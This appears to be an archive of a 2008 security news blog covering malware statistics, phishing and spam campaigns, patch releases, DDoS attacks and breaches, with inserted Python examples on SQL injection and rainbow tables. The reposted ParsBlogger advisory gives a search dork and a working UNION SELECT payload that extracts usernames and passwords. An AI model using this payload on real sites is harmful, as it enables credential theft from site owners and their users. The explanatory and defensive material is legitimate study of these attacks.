29.11.08

Malware attacks decline from the US, but increase from China, Russia and Korea


Thirty-five percent of all Internet intrusion attacks are coming from Korea, according to Network Box. The company's analysis of all Internet threats in November shows that Korea accounts for more than double the intrusions of its nearest competitor, the US (14 per cent). Spam and viruses are on the decline from the US, following the shutdown of the McColo spam hosting service earlier this month. Although over the full month the US was the biggest source of spam and viruses, this dropped sharply towards the end of November, when China took the top spot in the spam charts.


Top Ten Viruses

Threat Name (Daily Average %)
1. spam.phish.url 35.67821
2. can-2003-0161 14.69491
3. trojan-spy.html.fraud.gen 5.30703
4. trojan-dropper.win32.agent.yzp 4.05881
5. nbh-bscript 3.16169
6. spam.porn.spam_nb_porn_subj_csk_1 2.50091
7. nbh-multext 2.35456
8. policy_prohibits_'exe'_nested_at 1.79322
9. trojan-psw.win32.agent.lcc 1.78064
10. clm.html.phishing.pay-36 1.31201


Top Ten Trojans

Threat Name (Daily Average %)
1. trojan-spy.html.fraud.gen 0.11455
2. trojan-dropper.win32.agent.yzp 0.09805
3. trojan-psw.win32.agent.lcc 0.05511
4. trojan-spy.win32.zbot.fql 0.03281
5. trojan-spy.win32.zbot.frh 0.02655
6. clm.trojan.agent-61609 0.01474
7. trojan.win32.agent.amzt 0.01355
8. trojan-downloader.win32.small.afzf 0.00847
9. trojan-spy.win32.zbot.ghq 0.00711
10. trojan-downloader.win32.agent.anaq 0.00636


Top Ten Intrusions

Threat Name (Daily Average %)
1. NETBIOS 35.61600
2. BOGON 13.72736
3. PINGFLOOD 7.14538
4. HTTP-S-WEBDAV 0.03116
5. ICMP 0.02818
6. HTTP-S-WEBDEX 0.01964
7. SOBIG-F 0.01383
8. HTTP-S-NIMDA 0.00477
9. HTTP-S-UNIXATTACK 0.00439
10. HTTP-S-IISATTACK 0.00378


Top Ten Sources of Viruses

Country (Daily Average %)
1. US 19.49704
2. China 6.49728
3. Korea 6.36452
4. Australia 5.46776
5. UK 4.40333
6. Ukraine 4.39740
7. Turkey 3.88654
8. Russia 3.60779
9. Brazil 3.42233
10. Spain 2.77787


Top Ten Sources of Spam

Country (Daily Average %)
1. US 14.43738
2. China 9.99901
3. Korea 6.67193
4. Turkey 6.31428
5. Australia 5.94338
6. UK 4.46450
7. Brazil 4.19417
8. Spain 4.10385
9. Russia 3.83448
10. Poland 2.77324


Top Ten Sources of Intrusions

Country (Daily Average %)
1. Korea 34.90125
2. US 15.97265
3. Hong Kong 8.88417
4. China 8.45910
5. Malaysia 5.59282
6. Australia 3.90484
7. Turkey 1.46664
8. Brazil 1.15039
9. UK 1.00705
10. Poland 0.95489

Paypal Is Being Used In Popular Nigerian 419 Scam

A new variant of the popular Nigerian 419 scam is possible via Paypal, according to a report by the Inquirer. The 419 scam is named after the relevant section of the Nigerian Criminal Code, and the premise is always the same: somebody offers to pay money into your account and give you a cut when you send it back. In truth the whole thing is money laundering, but this latest twist, using Paypal, is significant because on the surface it looks like there is no catch.
Instead of receiving the offer via email (as is normally the case), this person was approached over a Skype chat session. The perpetrator wants to transfer funds out of a Paypal account and convert them back into US dollars. All the victim needed to do was check his Paypal account and, when the money arrived, send a significantly lower amount back via Western Union.
Paypal's payment reversal policy leaves a loophole that makes the scam work. As the payment would be classified as 'services' rather than goods, there would be no proof that the victim, who becomes the 'vendor', provided any goods. So the 'buyer', in this case the scammer, gets the money back. In the meantime, the vendor has sent the dollars via Western Union and finds himself stuck with no means of recourse.
Both Western Union and Paypal can be blamed for making this scam work. Western Union makes it too easy to send and receive money anonymously, while Paypal's dispute resolution procedure is a crude automated system.

28.11.08

Parsblogger Remote SQL Injection

Hack Detail :
--------------------------------------------------------------------------------------------------------------------
[~] Script : ParsBlogger
[~] Version : >!<
[~] Link : http://www.parsblogger.com/
[~] Dork : "Powered by ParsBlogger"
[~] Author : BorN To K!LL
[~] TeaM : Security Geeks [ Sec-Geeks.com ]
--------------------------------------------------------------------------------------------------------------------
[~] Exploit : .site.ir/blog.asp?wr=[SQL]
[~] Example : .site.ir/blog.asp?wr=-5+union+all+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13+from+writer
--------------------------------------------------------------------------------------------------------------------
[~] Greetings : [ Đr ĦλCКΣΓ ] , [ SECURITY GΣΣKS ] , [ AsbMay's Group ] , [ w4ck1ng TeaM ] , [ darkc0de TeaM ] , [ Juba ] .. n all muslims
--------------------------------------------------------------------------------------------------------------------
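The defect behind this advisory is a request parameter pasted straight into SQL text. The following Python/sqlite3 example is added here and is not ParsBlogger's code: it uses a constructed two-table toy schema (blog and writer, with a placeholder password value) and shows the string-concatenated query beside a hardened version that allow-lists the `wr` value as an integer and binds it as a parameter. The `UNION_PAYLOAD` constant is a constructed equivalent of the advisory's example, trimmed to the three columns of the toy query.

```python
import re
import sqlite3


def make_demo_db() -> sqlite3.Connection:
    """Constructed toy schema standing in for the blog/writer tables the advisory names."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE writer (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        CREATE TABLE blog   (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        INSERT INTO writer VALUES (1, 'editor', 'PLACEHOLDER-HASH');
        INSERT INTO blog   VALUES (5, 'Hello', 'first post');
    """)
    return con


def blog_post_unsafe(con: sqlite3.Connection, wr: str):
    """The defect class in the advisory: the request parameter becomes part of the SQL text,
    so a crafted value can append a UNION that reads an unrelated table."""
    sql = "SELECT id, title, body FROM blog WHERE id = " + wr
    return con.execute(sql).fetchall()


def blog_post_safe(con: sqlite3.Connection, wr: str):
    """Hardened form: allow-list validation of the id, then a bound parameter.
    Either measure alone would stop the injection; together they also give a clean error."""
    if not re.fullmatch(r"[1-9][0-9]{0,8}", wr):
        raise ValueError("wr must be a positive integer post id")
    return con.execute(
        "SELECT id, title, body FROM blog WHERE id = ?", (int(wr),)
    ).fetchall()


def safe_rejects(con: sqlite3.Connection, wr: str) -> bool:
    """True when the hardened handler refuses the value instead of running it."""
    try:
        blog_post_safe(con, wr)
    except ValueError:
        return True
    return False


# Constructed equivalent of the advisory's payload, adjusted to the 3-column toy query.
UNION_PAYLOAD = "-5 UNION ALL SELECT id, username, password FROM writer"

if __name__ == "__main__":
    db = make_demo_db()
    print("unsafe, normal id :", blog_post_unsafe(db, "5"))
    print("unsafe, payload   :", blog_post_unsafe(db, UNION_PAYLOAD))
    print("safe, normal id   :", blog_post_safe(db, "5"))
    print("safe rejects payload:", safe_rejects(db, UNION_PAYLOAD))
```

The unsafe handler returns the writer row for the crafted value, which is exactly the data exposure the advisory describes; the hardened handler never lets the value reach the SQL parser as code, and a server-side regex on a numeric id is also a cheap signal to log when it fails.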

Infecting Christmas E-greetings Are Distributed Via Spam

Websense Security Labs has discovered that malware authors are already using Christmas themes this year as a social engineering tactic, in an effort to gain control over compromised machines. This campaign uses email messages in the form of e-greetings, leading to supposed animated postcards. These actually lead to a Trojan backdoor that has been distributed in previous malicious spam campaigns.
The email messages, spoofed to appear as though they have been sent from postcards.org, display an animated Christmas scene. A URL link within the email leads to a malicious file called postcard.exe hosted on various servers, including those in the .com domain space.
Once executed, a backdoor is created by the malware author enabling access and control over the resources of the compromised machine. Control is conducted over IRC, communicating with ircserver.*snip*.la. During the install process an image called xmas.jpg is displayed to the user as a distraction technique.
Example of malicious email:



Malware Infected Spam Threatens To Suspend Internet Access


Spammers are constantly using simple social engineering tactics that scare people into opening malicious files. This is definitely not the first time, and the method seems to be rather successful. TrendLabs reports a new form of spam email containing a malicious file attachment that has been spreading over the Internet. This time the subject is “Your internet access is going to get suspended”. The spam email claims to come from an "ICS Monitoring Team", telling recipients that they have to stop their illegal downloading of copyrighted material or else their Internet access will be suspended.
The spam email claims that a report of the recipient’s activities for the past six months is in the attached zipped file. Instead of the said report, the zipped file contains a malicious executable file named user-EA49943X-activities.exe.
The malicious file is currently detected as TROJ_MEREDROP.GJ by TrendLabs. It drops two files, both GOLDUN variants. These Trojans are known information stealers that monitor the Internet browsing activities of affected users. In this particular case the cyber-criminals intend to steal credentials related to the online banking site www.e-gold.com.
This is not the first time malware authors have disguised themselves as the ‘Internet police’. Trend Micro researchers had already found spam that presented users with the same "ISP Consortium" spiel used in this campaign.


22.11.08

Top 5 Free Hacking Programs

Netcat

Netcat is a featured networking utility which reads and writes data across network connections, using the TCP/IP protocol. It is designed to be a reliable "back-end" tool that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need and has several interesting built-in capabilities.

Ophcrack
Ophcrack is a Windows password cracker based on a time-memory trade-off using rainbow tables. This is a new variant of Hellman's original trade-off, with better performance. It recovers 99.9% of alphanumeric passwords in seconds.
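To make the "time-memory trade-off using rainbow tables" concrete, here is a toy rainbow table in Python. It is an added example, not code from this page or from the Ophcrack project: the password space (three lowercase letters), the hash (SHA-256 standing in for the unsalted LM/NTLM hashes Ophcrack targets), the chain length, the reduction function and the choice of start points are all assumptions made for illustration. Only chain endpoints are stored; everything in between is recomputed during lookup, which is the trade-off.

```python
import hashlib

# Toy parameters: a tiny password space so the whole demonstration runs in well under a second.
ALPHABET = "abcdefghijklmnopqrstuvwxyz"
LENGTH = 3
SPACE = len(ALPHABET) ** LENGTH          # 17,576 possible passwords
CHAIN_LEN = 20                           # hash -> reduce steps per chain (assumed)


def H(password: str) -> bytes:
    """Unsalted hash; stands in for the unsalted Windows hashes rainbow tables target."""
    return hashlib.sha256(password.encode()).digest()


def int_to_password(n: int) -> str:
    """Enumerate the password space: 0 -> 'aaa', 1 -> 'baa', ..."""
    chars = []
    for _ in range(LENGTH):
        n, r = divmod(n, len(ALPHABET))
        chars.append(ALPHABET[r])
    return "".join(chars)


def reduce_to_password(digest: bytes, column: int) -> str:
    """Reduction function R_column: maps a hash back into the password space.
    Mixing in the column index is the rainbow-table refinement of Hellman's scheme;
    it keeps chains that collide in different columns from merging."""
    n = (int.from_bytes(digest[:8], "big") + column) % SPACE
    return int_to_password(n)


def build_table(start_points):
    """Precomputation: walk each chain and store only endpoint -> start point(s)."""
    table = {}
    for start in start_points:
        pw = start
        for column in range(CHAIN_LEN):
            pw = reduce_to_password(H(pw), column)
        table.setdefault(pw, []).append(start)
    return table


def lookup(table, target: bytes):
    """Recover the password for an unsalted hash, or return None if no chain covers it."""
    for column in range(CHAIN_LEN - 1, -1, -1):
        # Assume the password sat in this column; roll forward to the chain's endpoint.
        pw = reduce_to_password(target, column)
        for c in range(column + 1, CHAIN_LEN):
            pw = reduce_to_password(H(pw), c)
        for start in table.get(pw, []):
            # Endpoint matched: regenerate that chain and look for the exact hash.
            # This step also filters false alarms caused by chain merges.
            cand = start
            for c in range(CHAIN_LEN):
                if H(cand) == target:
                    return cand
                cand = reduce_to_password(H(cand), c)
    return None


def coverage(table, sample) -> float:
    """Fraction of the sample passwords recovered from their hashes."""
    hits = sum(1 for pw in sample if lookup(table, H(pw)) == pw)
    return hits / len(sample)


# Constructed sample table: every 37th password as a chain start (about 475 chains),
# i.e. roughly 475 stored endpoints instead of 17,576 precomputed hashes.
START_POINTS = [int_to_password(i) for i in range(0, SPACE, 37)]
TABLE = build_table(START_POINTS)

if __name__ == "__main__":
    sample = [int_to_password(i * 7919 % SPACE) for i in range(200)]
    print("aaa from its hash  :", lookup(TABLE, H("aaa")))
    print("salted hash lookup :", lookup(TABLE, H("s4lt" + "aaa")))
    print("coverage on sample :", coverage(TABLE, sample))
```

The salted lookup returns None because the table was built for H(password) and not for H(salt + password); every distinct salt would need its own table, which is why salted password storage defeats this attack class and why unsalted LM/NTLM hashes are the ones Ophcrack's tables are built for.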
Cain & Abel
Cain & Abel is a password recovery tool for Microsoft operating systems. It allows easy recovery of various kinds of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes and analyzing routing protocols.
John the Ripper
John the Ripper is a fast password cracker, currently available for many flavors of Unix (eleven are officially supported, not counting different architectures), DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak passwords. Besides several crypt(3) password hash types most commonly found on various Unix flavors, supported out of the box are Kerberos AFS and Windows NT, 2000, XP, 2003, LM hashes, plus several more with contributed patches.
SNORT
SNORT® is an open source network intrusion prevention and detection system utilizing a rule-driven language, which combines the benefits of signature, protocol and anomaly based inspection methods. With millions of downloads to date, Snort is the most widely deployed intrusion detection and prevention technology worldwide and has become the de facto standard for the industry.

Pentagon Hit by Unprecedented Cyber Attack


As a result of the cyber attack, the Defense Department has banned the use of external hardware devices throughout a vast network of military computers.

The Pentagon has suffered from a cyber attack so alarming that it has taken the unprecedented step of banning the use of external hardware devices, such as flash drives and DVDs, FOX News has learned.
The attack came in the form of a global virus or worm that is spreading rapidly throughout a number of military networks.
"We have detected a global virus for which there has been alerts, and we have seen some of this on our networks," a Pentagon official told FOX News. "We are now taking steps to mitigate the virus."
The official could not reveal the source of the attack because that information remains classified.
"Daily there are millions of scans of the GIG, but for security reasons we don't discuss the number of actual intrusions or attempts, or discuss specific measures commanders in the field may be taking to protect and defend our networks," the department said in an official statement.
Military computers are often referred to as part of the Global Information Grid, or GIG, a system composed of 17 million computers, many of which house classified or sensitive information.
FOX News obtained a copy of one memo sent out last week to an Army division within the Pentagon warning of the cyber attack.
"Due to the presence of commercial malware, CDR USSTRATCOM has banned the use of removable media (thumb drives, CDRs/DVDRs, floppy disks) on all DoD networks and computers effective immediately."
source : Fox News

12 Security Vulnerabilities Fixed In Apple iPhone OS 2.2 Update


Apple has released iPhone OS 2.2 with patches for 12 documented security flaws, some very serious. The vulnerabilities covered by the patch (which also affect iPod Touch) could allow remote code execution, information theft, software crashes and weakened encryption settings.
The updates include:
CVE-2008-2321: CoreGraphics contains memory corruption issues in the processing of arguments. Passing untrusted input to CoreGraphics via an application, such as a web browser, may lead to an unexpected application termination or arbitrary code execution.
CVE-2008-2327: Multiple uninitialized memory access issues exist in libTIFF’s handling of LZW-encoded TIFF images. Viewing a maliciously crafted TIFF image may lead to an unexpected application termination or arbitrary code execution.
CVE-2008-1586: A memory exhaustion issue exists in the handling of TIFF images. Viewing a maliciously crafted TIFF image may lead to an unexpected device reset.
CVE-2008-4227: The encryption level for PPTP VPN connections may revert to a previous lower setting. This update addresses the issue by properly setting the encryption preferences.
CVE-2008-4211: An issue in Office Viewer’s handling of columns in Microsoft Excel files may result in an out-of-bounds memory access. Viewing a maliciously crafted Microsoft Excel file may lead to an unexpected application termination or arbitrary code execution.
CVE-2008-4228: iPhone provides the ability to make an emergency call when locked. Currently, an emergency call may be placed to any number. A person with physical access to an iPhone may take advantage of this feature to place arbitrary calls which are charged to the iPhone owner.
CVE-2008-4229: The Passcode Lock feature is designed to prevent applications from being launched unless the correct passcode is entered. A race condition in the handling of device settings may cause the Passcode Lock to be removed when the device is restored from backup. This may allow a person with physical access to the device to launch applications without the passcode.
CVE-2008-4230: If an SMS message arrives while the emergency call screen is visible, the entire SMS message is displayed, even if the “Show SMS Preview” preference was set to “OFF”. This update addresses the issue by, in this situation, displaying only a notification that an SMS message has arrived, and not its content.
CVE-2008-4231: A memory corruption issue exists in the handling of HTML table elements. Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution.
CVE-2008-4232: Safari allows an iframe element to display content outside its boundaries, which may lead to user interface spoofing.
CVE-2008-4233: If an application is launched via Safari while a call approval dialog is shown, the call will be placed. This may allow a maliciously crafted website to initiate a phone call without user interaction. Additionally, under certain circumstances it may be possible for a maliciously crafted website to block the user’s ability to cancel dialing for a short period of time.
CVE-2008-3644: Disabling autocomplete on a form field may not prevent the data in the field from being stored in the browser page cache. This may lead to the disclosure of sensitive information to a person with physical access to an unlocked device.
There are still several known phishing and spamming flaws in iPhone that remain unfixed.

18.11.08

Website For The President Of Georgia Under Distributed Denial Of Service Attack

Steven Adair from Shadowserver reports a multi-pronged distributed denial of service (DDoS) attack against the website of the President of Georgia, Mikhail Saakashvili (www.president.gov.ge). For over 24 hours the website has been unavailable. The attack began very early Saturday morning (Georgian time). Shadowserver has observed at least one web-based command and control (C&C) server taking aim at the website, hitting it with a variety of simultaneous attacks. The C&C server has instructed its bots to attack the website with TCP, ICMP, and HTTP floods.
The server [62.168.168.9] which houses the website has been largely offline since the attack started. Passive DNS records show the system houses several other websites which are mostly unrelated to the Georgian government. However, the server does also host the Social Assistance and Employment State Agency website (www.saesa.gov.ge). This website along with the others on the host have been rendered inaccessible.
The C&C server involved in these attacks is on the IP address 207.10.234.244, which is subsequently located in the United States. Shadowserver recommends blocking and/or monitoring for traffic to this address. Currently it appears the host site for 207.10.234.244 has taken action against this system and appears to now be blocking access to it. However, the server being targeted by the C&C is still unreachable.
Recent DDoS attacks against various other neighbors of Russia to include Estonia have been quite popular in the last few years. We do not have any solid proof that the people behind this C&C server are Russian. However, the HTTP-based botnet C&C server is a MachBot controller, which is a tool that is frequently used by Russian bot herders. On top of that the domain involved with this C&C server has seemingly bogus registration information but does tie back to Russia.
Update (July 22): Georgian authorities denied this attack. According to Interfax, Georgian press center claimed that the website worked without difficulties and the reports about a DDoS attack are false.

BBC Website Hit By DDoS Attack


The British Broadcasting Corporation (bbc.co.uk) was hit by a DDoS attack on Thursday, according to a statement sent to the Inquirer. The BBC said the attack originated in a number of different countries but didn’t specify which. When the BBC techies blocked international access to a limited subset of servers, it resulted in a marked improvement of the serving of bbc.co.uk. Service supplier Siemens was forced to block addresses and prevent the attack using other methods like changing the DNS settings.
The outage, 1 hour and 15 minutes in total and the longest time the site has been offline in all of 2008, was also confirmed by the distributed uptime monitoring company Pingdom earlier today. During the attack the BBC website responded very slowly, and Pingdom's monitoring shows that for a total of 1 hour and 15 minutes it did not respond at all. The downtime was spread over multiple short intervals, lasting just a few minutes each time. The attack lasted the entire evening: it started to have an effect after 5 p.m. CET, and performance was not back to normal until after 10 p.m. CET. Analyzing the response times of the website clearly shows the effect the DDoS attack had on the performance of the BBC website.
With the lack of specific details regarding the DDoS attack provided by the BBC, the reason for this attack is unclear.

13.11.08

Firefox 3.0.4, Firefox 2.0.0.18 And Seamonkey 1.1.13 Released, 11 Security Vulnerabilities Patched, 4 Of Them Critical


Mozilla has released a new version of its flagship Firefox browser to fix a total of 11 vulnerabilities that expose users to code execution, information stealing or denial-of-service attacks. Four of the 11 flaws covered with the new Firefox 3.0.4 are rated “critical” because of the risk of code execution attacks via specially rigged Web pages.
The four critical vulnerabilities are:
MFSA 2008-55 Crash and remote code execution in nsFrameManager. A vulnerability in part of Mozilla’s DOM constructing code can be exploited by modifying certain properties of a file input element before it has finished initializing. When the blur method of the modified input element is called, uninitialized memory is accessed by the browser, resulting in a crash. This crash may be used by an attacker to run arbitrary code on a victim’s computer.
MFSA 2008-54 Buffer overflow in http-index-format parser. This is a flaw in the way Mozilla parses the http-index-format MIME type. By sending a specially crafted 200 header line in the HTTP index response, an attacker can cause the browser to crash and run arbitrary code on the victim’s computer.
MFSA 2008-53 XSS and JavaScript privilege escalation via session restore. The browser’s session restore feature can be used to violate the same-origin policy and run JavaScript in the context of another site. Any otherwise unexploitable crash can be used to force the user into the session restore state. This vulnerability could also be used by an attacker to run arbitrary JavaScript with chrome privileges.
MFSA 2008-52 Crashes with evidence of memory corruption. Mozilla developers identified and fixed several stability bugs in the browser engine used in Firefox and other Mozilla-based products. Some of these crashes showed evidence of memory corruption under certain circumstances and we presume that with enough effort at least some of these could be exploited to run arbitrary code.
The Firefox update also fixes the following issues:
MFSA 2008-58 Parsing error in E4X default namespace.
MFSA 2008-57 -moz-binding property bypasses security checks on codebase principals.
MFSA 2008-56 nsXMLHttpRequest::NotifyEventListeners() same-origin violation.
MFSA 2008-51 file: URIs inherit chrome privileges when opened from chrome.
MFSA 2008-47 Information stealing via local shortcut files.
Mozilla recommends that users who still run FF2 upgrade to FF3 as soon as possible.

11.11.08

Introducing New Vulnerability Scanners

GFI LANguard N.S.S. makes use of state of the art vulnerability check databases based on OVAL and SANS Top 20, providing over 15,000 vulnerability assessments when your network is scanned. GFI LANguard N.S.S. gives you the information and tools you need to perform multi-platform scans across all environments, to analyze your network’s security health and effectively install and manage patches on all machines across different operating systems and in different languages. This results in a consistently configured environment that is secure against all vulnerabilities.
QualysGuard® Vulnerability Management (VM) automates the lifecycle of network auditing and vulnerability management across the enterprise, including network discovery and mapping, asset prioritization, vulnerability assessment reporting and remediation tracking according to business risk. Driven by the most comprehensive vulnerability KnowledgeBase in the industry, QualysGuard delivers continuous protection against the latest worms and security threats without the substantial cost, resource and deployment issues associated with traditional software. As an on demand Software-as-a-Service (SaaS) solution, there is no infrastructure to deploy or manage.
QualysGuard VM enables small to large organizations to effectively manage their vulnerabilities and maintain control over their network security with centralized reports, verified remedies, and full remediation workflow capabilities with trouble tickets. QualysGuard provides comprehensive reports on vulnerabilities including severity levels, time to fix estimates and impact on business, plus trend analysis on security issues.
By continuously and proactively .
Nessus 3.0 (for Windows, Linux and others)
Passive vulnerability scanning is the process of monitoring network traffic at the packet layer to determine topology, services, and vulnerabilities. This document will discuss the technology of passive vulnerability scanning, its deployment issues, and its many applications. It will also compare passive vulnerability scanning technology to network intrusion detection technology. Example "plugins" used to detect network vulnerabilities are also included. This paper assumes the reader has a basic knowledge of TCP/IP networking, network intrusion detection, and vulnerability scanning.
Tenable offers the Passive Vulnerability Scanner (formerly NeVO). This paper not only serves as an introduction to passive vulnerability scanning, it also includes many examples specific to the Passive Vulnerability Scanner.

Barack Obama used for a malware spam attack


Malware authors haven’t been slow reacting to the latest US election news, and President-elect Barack Obama is already being used as a lure for infecting unsuspecting internet users. Here is a typical piece of spam that is being seen in Sophos spam traps around the world:



Were you to click on the link you would find yourself on a website pretending to be a news site offering information and a video of Barack Obama’s historic win. However, the site tries to fool you into installing what it claims is an update to Adobe Flash to view the video.

The file referenced is detected by Sophos as a piece of malware called Mal/Behav-027. It’s likely that the cybercriminals behind this attack will rotate the malware being served up by this dangerous website - so we will continue to monitor its activity as well as block access to the infected webpage with our web protection solutions.

9.11.08

Latest Virus Description !!

Trojan-Downloader.JS.Small.fi (29 Oct 2008 20:03:00 +030): This Trojan downloads other files via the Internet and launches them for execution on the victim machine. The program is an HTML page which contains Java Script scenarios. It is 1432 bytes in size.
Trojan-PSW.Win32.OnLineGames.sxa (29 Oct 2008 20:01:00 +030): This malicious program is a Trojan. It is a Windows PE EXE file. It is 118103 bytes in size. Installation: The Trojan copies its executable file to the Windows system directory: %System%\kavo.exe. In order to ensure that the Trojan is launched automatically each time the system is restarted, the…
Trojan-PSW.Win32.OnLineGames.lfi (29 Oct 2008 20:00:00 +030): This malicious program is a Trojan. It is a Windows PE EXE file. It is 123873 bytes in size. Installation: The Trojan copies its executable file to the Windows system directory: %System%\amvo.exe. In order to ensure that the Trojan is launched automatically each time the system is restarted, the…
Trojan-Downloader_Win32_Agent.nmi (29 Oct 2008 19:59:00 +030): This Trojan downloads another program via the Internet and launches it on the victim machine without the user’s knowledge or consent. It is a Windows PE EXE file. The size of infected files can range from 18KB to 47KB.
Trojan-Downloader.Win32.Braidupdate.c (28 Oct 2008 15:54:00 +030): This Trojan downloads another program via the Internet and launches it on the victim machine without the user’s knowledge or consent. It is a Windows PE EXE file. It is 79360 bytes in size. It is written in C++. Installation: In order to ensure that the Trojan is launched automatically each…
Trojan-Downloader.JS.Agent.sg (28 Oct 2008 15:52:00 +030): This Trojan downloads other files via the Internet and launches them for execution on the victim machine. It is an HTML page which contains Visual Basic Script and Java Script. It is 677 bytes in size.
Trojan-GameThief.Win32.OnLineGames.tnys (28 Oct 2008 15:48:00 +030): This Trojan is designed to steal account data from the online game LineAge2. It is a Windows PE EXE file. It is 654848 bytes in size.

8.11.08

White House Network Hacked By Chinese On Multiple Occasions


According to Demetri Sevastopulo from Financial Times, Chinese hackers have penetrated the White House computer network on multiple occasions, and obtained e-mails between government officials. US officials say Chinese hackers have raided White House email archives multiple times. The Financial Times reports some people it describes as “US government cyber experts” suspect the raids were sponsored by the Chinese regime.
Each attack cracked the unclassified network’s defenses for a short time. The classified network remained secure, according to the Financial Times. The official said the Chinese cyber attacks had the hallmarks of the “grain of sands” approach taken by Chinese intelligence, which involves obtaining and poring through lots of (often low-level) information to find a few nuggets.
“For a short period of time, they successfully breach a wall, and then you rebuild the wall  …  it is not as if they have continued access. It is constant cat and mouse on this stuff,” the source reportedly said.
The FT’s revelations came just days after Newsweek reported that both the Obama and McCain campaigns had been hacked from overseas, with large amounts of data downloaded, apparently in an attempt to track the candidates’ evolving policy positions. This could of course potentially help the unnamed foreign entities in future negotiations.
The campaign attacks were picked up by the authorities, with the FBI and the Secret Service notifying the Obama campaign back in August that what staffers thought was a virus was something more sinister.
“You have a problem way bigger than what you understand,” an FBI agent reportedly told Obama staff members. “You have been compromised, and a serious amount of files have been loaded off your system.”
The US has increased efforts to tackle cyber security, particularly since Chinese hackers believed to be associated with the People’s Liberation Army last year perpetrated a major attack on the Pentagon.
US military computer experts battled for weeks against a sustained attack that eventually overcame the Pentagon’s defenses. The cyber attackers managed to obtain information and email traffic from the unclassified computer system that supports Robert Gates, the defense secretary. Pentagon IT technicians were forced to take the network down for days to conduct repairs.
Concerns about Chinese hacking last year prompted President George W. Bush to tell reporters ahead of a meeting with President Hu Jintao of China that he might raise the issue with countries of concern.
Over the past year, the US government has tightened restrictions on officials using BlackBerrys and computers overseas, particularly in Russia and China, and sometimes bars them from removing the equipment from US government aircraft in the country.
In another incident, US government cyber investigators have determined that an attack this summer on the Obama and McCain campaign computer networks also originated in China. Details of the intrusion were first reported by Newsweek.
“There is no doubt that foreign governments are actively targeting cyber space not only for sensitive information but to influence our most sensitive processes such as the US presidential election,” said Sami Saydjari, head of the Cyber Defence Agency, a private company that advises government on hacking.
While the US has raised concerns about cyber attacks, many governments believe the US is also engaged in electronic spying. Bob Woodward, the veteran Washington Post reporter, this year revealed that the US had been spying on the Iraqi government.

Highly Critical Vulnerabilities In VLC Media Player

The issues, reported in versions 0.5.0 through 0.9.5, could let hackers take complete control of compromised machines through rigged media files. VideoLAN, the open-source group that manages the VLC project, has released patches and strongly recommends that users upgrade to VLC media player 0.9.6.
Exploitation of this issue requires the user to explicitly open a specially crafted file. As with any media player, the standard advice is to avoid opening files from untrusted third parties or accessing untrusted remote sites.

Details:

Summary : Buffer overflows in VLC RealText and CUE demuxers
Date : November 2008
Affected versions : VLC media player 0.9.5 down to 0.5.0
ID : VideoLAN-SA-0810
CVE reference : CVE-2008-xxxx, CVE-2008-xxxx

Solution

VLC media player 0.9.6 addresses this issue. Patches for older versions are available from the official VLC source code repository 0.9-bugfix branch.

Daily Report

7.11.08

Breaking News

Facebook “added friend confirmation” Malicious Spam


Websense Security Labs has discovered another round of malicious Facebook messages. This campaign is another visual social-engineering spam campaign which tries to visually trick users into believing that the message is a legitimate added friend confirmation. The “From” address in the message is spoofed to make it look as if it was sent from Facebook, and the links look like they lead to Facebook.


In the previous Facebook “add friend” malicious spam campaign, spammers included a malicious zip attachment that claimed to contain a picture, to entice the recipient to double-click on it. From a spammer’s perspective, the likelihood of attack success decreases when antivirus software picks up the attachment. If not picked up by antivirus software, then content learning technologies filter such messages and their attachments after receiving a certain volume of similar messages.


In order to sustain the attack over a longer period with higher success rates, spammers have switched tactics and now include links to an external website. External links make antivirus detection harder, as not all antivirus software can scan or detect links included in email messages. Also, from a spammer's perspective, using links to compromised "legitimate" domains that host the malware as the lure increases the success rate, because such links are more likely to bypass security filters that rely heavily on reputation services.


Websense Security Labs sees these tactics adopted by spammers and malware authors as an ongoing trend, increasingly targeting Web 2.0 sites to carry out a wide range of attacks.


The links in the message actually lead to a malicious executable named “update.exe” (SHA1: a4dc17d1bcb191af75afedddf60aecbc2af2a37f).


This malicious executable has very low AV detection. When run, it steals data from the victim's machine and connects to an IRC botnet.

Breaking News

After Election: Files Stolen In Obama And McCain Campaigns Cyberattack, Obama-themed Malware Makes Rounds

According to an article published Wednesday by Newsweek, hackers broke into computer systems of both the Barack Obama and John McCain campaigns and stole a large amount of data.
Officials with the FBI and the Secret Service notified Obama staffers in August of the breach after tech consultants for the campaign detected what they thought at the time was a computer virus. “You have a problem way bigger than what you understand,” an FBI agent told Obama staff members. “You have been compromised, and a serious amount of files have been loaded off your system.”
White House chief of staff Josh Bolten also weighed in, telling an Obama campaign chief: “You have a real problem…and you have to deal with it.”
Investigators told Obama aides that the McCain computer systems had been similarly compromised. A senior McCain official confirmed to Newsweek that the campaign’s network had been hacked and the FBI was investigating.
According to investigators at the FBI and the White House, a “foreign entity or organization” is believed to be behind the attacks in an attempt to “gather information on the evolution of both camps’ policy positions.” The information could prove useful in negotiations with a future administration. The investigators told the Obama team the hack wasn’t carried out by political opponents.
Representatives of both campaigns weren’t available to comment on the Newsweek report.
Cyber criminals are actively capitalizing on Barack Obama’s victory in the US presidential race. Within 12 hours of his acceptance speech Tuesday night, net users were being treated to scams involving Google AdWords and prodigious volumes of spam.
The spam comes masked as dispatches from legitimate news sources, including the BBC and CNN, and invite readers to click a link to view a video of Obama accepting his country’s vote. Those who take the bait are sent to a spoof page of the news site that claims they need to update their Adobe Flash Player before viewing the speech.
In fact, Adobe_flash9.exe installs the notorious Trojan-PSW:W32/Papras.CL, according to anti-virus provider F-Secure. Earlier Wednesday, just 14 of the 36 major anti-virus programs detected the trojan, according to an analysis from VirusTotal. Once installed, the malware, which cloaks itself in a rootkit, logs passwords for bank sites and other sensitive information and sends them to a server located in Ukraine.
The fraudulent news sites are being hosted on a fast-flux network of infected machines, according to CyberCrime & Doing Time blog. Cloudmark, a company that provides spam filtering service, has already seen more than 10 million of the spam messages, according to the Zero Day blog.
